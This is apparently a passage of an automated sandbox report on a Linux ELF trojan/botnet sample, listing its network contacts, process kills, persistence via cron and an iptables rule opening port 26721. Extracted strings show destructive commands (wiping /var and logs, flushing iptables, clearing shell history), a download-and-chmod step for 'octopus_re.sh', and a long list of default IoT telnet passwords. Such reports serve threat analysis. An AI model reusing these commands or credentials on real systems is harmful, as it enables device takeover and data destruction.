              Source: unknownUDP traffic detected without corresponding DNS query: 185.181.61.24
              Source: unknownUDP traffic detected without corresponding DNS query: 91.217.137.37
              Source: unknownUDP traffic detected without corresponding DNS query: 91.217.137.37
              Source: unknownUDP traffic detected without corresponding DNS query: 91.217.137.37
              Source: unknownUDP traffic detected without corresponding DNS query: 91.217.137.37
              Source: unknownUDP traffic detected without corresponding DNS query: 91.217.137.37
              Source: global trafficDNS traffic detected: DNS query: octopus1337.geek
              Source: OocBsRyXoT.elfString found in binary or memory: http://Change_ip/octopus_re.sh;chmod

              System Summary

              barindex
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5638, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5639, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5685, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5680, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5682, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5691, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5731, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5736, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5738, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5690, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5732, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5737, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5782, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5789, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5779, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5784, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5812, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5829, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5830, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5808, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5827, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5837, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5836, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5838, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 800, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 803, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1445, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1479, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1484, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1486, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1498, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1509, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1588, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1591, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1595, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1603, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1615, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1623, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1659, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1660, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1666, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1669, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1679, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1690, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1691, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1692, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1695, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1701, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1704, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1729, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1730, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1732, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1762, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1806, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1867, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3027, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3062, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3064, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3183, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3192, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3205, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3210, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3249, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3250, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3251, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3252, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3253, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3255, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3272, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3274, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3298, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3303, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3316, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3332, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3368, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3379, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3394, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3399, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3419, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3440, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3456, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3461, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3465, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3469, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3475, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3488, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3703, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 5541, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 5783, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 5831, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 5898, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 5902, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 5935, result: successfulJump to behavior
              Source: Initial sampleString containing 'busybox' found: pkill -9 busybox
              Source: Initial sampleString containing 'busybox' found: mipsrm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmprm -rf /tmp/*iptables -Fpkill -9 busyboxpkill -9 perlpkill -9 pythonservice iptables stop/sbin/iptables -F; /sbin/iptables -Xservice firewall stophistory -crm -rf ~/.bash_historyhistory -w0.0.0.0
              Source: Initial sampleString containing 'busybox' found: /bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
              Source: Initial sampleString containing 'busybox' found: busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
              Source: Initial sampleString containing 'busybox' found: /dev/watchdog/dev/misc/watchdogwatchdogrootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxpasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedbinvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetciscosetsockoptbindlisten1.1.1.1hi im here, i think/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPTbusybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPTbindtoipconnectpoll
              Source: ELF static info symbol of initial sample.symtab present: no
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5638, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5639, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5685, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5680, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5682, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5691, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5731, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5736, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5738, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5690, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5732, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5737, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5782, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5789, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5779, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5784, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5812, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5829, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5830, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5808, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5827, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5837, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5836, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5621)SIGKILL sent: pid: 5838, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 800, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 803, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1445, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1479, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1484, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1486, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1498, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1509, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1588, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1591, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1595, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1603, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1615, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1623, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1659, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1660, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1666, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1669, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1679, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1690, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1691, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1692, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1695, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1701, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1704, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1729, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1730, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1732, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1762, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1806, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 1867, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3027, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3062, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3064, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3183, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3192, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3205, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3210, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3249, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3250, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3251, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3252, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3253, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3255, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3272, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3274, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3298, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3303, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3316, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3332, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3368, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3379, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3394, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3399, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3419, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3440, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3456, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3461, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3465, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3469, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3475, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3488, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 3703, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 5541, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 5783, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 5831, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 5898, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 5902, result: successfulJump to behavior
              Source: /tmp/OocBsRyXoT.elf (PID: 5623)SIGKILL sent: pid: 5935, result: successfulJump to behavior
              Source: classification engineClassification label: mal96.spre.troj.evad.linELF@0/2@50/0

              Data Obfuscation

              barindex
              Source: /tmp/OocBsRyXoT.elf (PID: 5624)Written: /dev/ocmountJump to behavior

              Persistence and Installation Behavior

              barindex
              Source: /bin/sh (PID: 5928)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
              Source: /bin/sh (PID: 5899)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
              Source: /bin/sh (PID: 5635)File: /etc/cron.d/mount.shJump to behavior
              Source: /usr/sbin/service (PID: 5565)Systemctl executable stopping iptables: /usr/sbin/systemctl -> systemctl stop iptables.serviceJump to behavior
              Source: /usr/sbin/service (PID: 5565)Systemctl executable stopping iptables: /usr/bin/systemctl -> systemctl stop iptables.serviceJump to behavior
              Source: /usr/bin/rm (PID: 5522)Directory: /var/lib/php/..Jump to behavior
              Source: /usr/bin/rm (PID: 5522)Directory: /var/lib/gdm3/.cacheJump to behavior
              Source: /usr/bin/rm (PID: 5522)Directory: /var/lib/gdm3/.cacheJump to behavior
              Source: /usr/bin/rm (PID: 5522)Directory: /var/lib/gdm3/.configJump to behavior
              Source: /usr/bin/rm (PID: 5522)Directory: /var/lib/gdm3/.configJump to behavior
              Source: /usr/bin/rm (PID: 5522)Directory: /var/lib/gdm3/.localJump to behavior
              Source: /usr/bin/rm (PID: 5522)Directory: /var/lib/gdm3/.localJump to behavior
              Source: /usr/bin/rm (PID: 5522)Directory: /var/lib/snapd/assertions/asserts-v0/..Jump to behavior
              Source: /usr/bin/rm (PID: 5522)Directory: /var/lib/snapd/assertions/..Jump to behavior
              Source: /usr/bin/rm (PID: 5522)Directory: /var/lib/snapd/..Jump to behavior
              Source: /usr/bin/rm (PID: 5522)Directory: /var/lib/colord/.cacheJump to behavior
              Source: /usr/bin/rm (PID: 5522)Directory: /var/lib/systemd/deb-systemd-helper-enabled/.wantsJump to behavior
              Source: /usr/bin/rm (PID: 5522)Directory: /var/lib/systemd/deb-systemd-helper-enabled/.wantsJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/110/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/110/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/231/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/231/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/111/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/111/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/112/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/112/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/233/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/233/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/113/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/113/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/114/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/114/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/235/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/235/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/115/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/115/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/1333/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/1333/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/116/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/116/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/1695/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/1695/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/117/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/117/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/118/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/118/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/119/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/119/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/911/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/911/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/914/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/914/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/3877/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/3877/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/10/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/10/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/917/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/917/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/3758/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/3758/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/11/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/11/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/12/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/12/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/13/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/13/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/14/statusJump to behavior
